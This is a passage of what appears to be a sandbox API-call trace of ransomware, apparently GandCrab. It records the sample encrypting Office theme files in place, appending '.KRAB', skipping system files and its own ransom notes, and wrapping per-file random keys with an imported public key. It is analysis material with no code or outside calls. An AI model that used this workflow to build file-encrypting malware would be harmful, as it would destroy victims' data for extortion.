returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" [0071.169] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0071.169] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx.KRAB") returned 133 [0071.169] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0071.169] lstrlenW (lpString=".thmx") returned 5 [0071.169] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.170] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0071.170] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0071.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="desktop.ini") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="autorun.inf") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntuser.dat") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="iconcache.db") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="bootsect.bak") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="boot.ini") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntuser.dat.log") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="thumbs.db") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0071.170] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.171] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.171] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntldr") returned 1 [0071.171] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="NTDETECT.COM") returned 1 [0071.171] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="Bootfont.bin") returned 1 [0071.171] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.171] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0071.171] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.172] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.172] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0071.172] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.172] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.172] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0071.173] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.190] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.190] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.190] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0071.190] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.190] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.191] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10121a0) returned 1 [0071.191] CryptImportKey (in: hProv=0x10121a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x10238f8) returned 1 [0071.191] CryptGetKeyParam (in: hKey=0x10238f8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.191] CryptEncrypt (in: hKey=0x10238f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.192] GetLastError () returned 0x0 [0071.192] CryptDestroyKey (hKey=0x10238f8) returned 1 [0071.192] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.192] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10121a0) returned 1 [0071.193] CryptImportKey (in: hProv=0x10121a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023a78) returned 1 [0071.193] CryptGetKeyParam (in: hKey=0x1023a78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.193] CryptEncrypt (in: hKey=0x1023a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.197] GetLastError () returned 0x0 [0071.197] CryptDestroyKey (hKey=0x1023a78) returned 1 [0071.197] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.197] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0071.209] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0071.209] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0071.209] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x8301c, lpOverlapped=0x0) returned 1 [0071.324] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff7cfe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.324] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x8301c, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x8301c, lpOverlapped=0x0) returned 1 [0071.325] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0071.325] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.330] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.344] CloseHandle (hObject=0x484) returned 1 [0071.374] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.374] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx.krab")) returned 1 [0071.375] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.376] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0071.376] lstrcmpW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2=".") returned 1 [0071.376] lstrcmpW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="..") returned 1 [0071.376] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001106[[fn=Badge]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" [0071.376] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0071.377] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx.KRAB") returned 134 [0071.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0071.378] lstrlenW (lpString=".thmx") returned 5 [0071.378] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.378] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0071.378] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0071.378] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0071.378] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="desktop.ini") returned 1 [0071.378] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="autorun.inf") returned 1 [0071.378] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntuser.dat") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="iconcache.db") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="bootsect.bak") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="boot.ini") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntuser.dat.log") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="thumbs.db") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntldr") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="NTDETECT.COM") returned 1 [0071.379] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="Bootfont.bin") returned 1 [0071.379] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.379] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0071.380] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.380] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.380] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.380] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0071.381] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0071.382] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.382] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10121a0) returned 1 [0071.382] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.383] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.383] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.383] CryptGenRandom (in: hProv=0x10121a0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0071.383] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.383] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.384] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10121a0) returned 1 [0071.384] CryptImportKey (in: hProv=0x10121a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023838) returned 1 [0071.384] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.384] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.385] GetLastError () returned 0x0 [0071.385] CryptDestroyKey (hKey=0x1023838) returned 1 [0071.385] CryptReleaseContext (hProv=0x10121a0, dwFlags=0x0) returned 1 [0071.385] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0071.385] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023af8) returned 1 [0071.385] CryptGetKeyParam (in: hKey=0x1023af8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.385] CryptEncrypt (in: hKey=0x1023af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.386] GetLastError () returned 0x0 [0071.386] CryptDestroyKey (hKey=0x1023af8) returned 1 [0071.386] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0071.386] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0071.386] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0071.387] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0071.387] ReadFile (in: hFile=0x484, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xa2181, lpOverlapped=0x0) returned 1 [0071.475] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfff5de7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.475] WriteFile (in: hFile=0x484, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xa2181, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xa2181, lpOverlapped=0x0) returned 1 [0071.477] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0071.477] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.481] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.483] CloseHandle (hObject=0x484) returned 1 [0071.508] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.517] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx.krab")) returned 1 [0071.518] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.518] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0071.518] lstrcmpW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2=".") returned 1 [0071.518] lstrcmpW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="..") returned 1 [0071.518] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001114[[fn=Gallery]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" [0071.518] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0071.518] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx.KRAB") returned 136 [0071.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0071.519] lstrlenW (lpString=".thmx") returned 5 [0071.519] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.519] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0071.519] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0071.519] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="desktop.ini") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="autorun.inf") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntuser.dat") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="iconcache.db") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="bootsect.bak") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="boot.ini") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntuser.dat.log") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="thumbs.db") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntldr") returned 1 [0071.519] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="NTDETECT.COM") returned 1 [0071.520] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="Bootfont.bin") returned 1 [0071.520] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0071.520] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012448) returned 1 [0071.520] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.521] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.521] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.521] CryptGenRandom (in: hProv=0x1012448, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0071.521] CryptReleaseContext (hProv=0x1012448, dwFlags=0x0) returned 1 [0071.521] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.521] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10122b0) returned 1 [0071.522] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0071.522] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0071.522] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0071.522] CryptGenRandom (in: hProv=0x10122b0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0071.522] CryptReleaseContext (hProv=0x10122b0, dwFlags=0x0) returned 1 [0071.522] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.523] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10122b0) returned 1 [0071.523] CryptImportKey (in: hProv=0x10122b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023a38) returned 1 [0071.523] CryptGetKeyParam (in: hKey=0x1023a38, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.523] CryptEncrypt (in: hKey=0x1023a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0071.523] GetLastError () returned 0x0 [0071.523] CryptDestroyKey (hKey=0x1023a38) returned 1 [0071.523] CryptReleaseContext (hProv=0x10122b0, dwFlags=0x0) returned 1 [0071.523] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10121a0) returned 1 [0071.524] CryptImportKey (in: hProv=0x10121a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023e38) returned 1 [0071.524] CryptGetKeyParam (in: hKey=0x1023e38, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0071.524] CryptEncrypt (in: hKey=0x1023e38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | 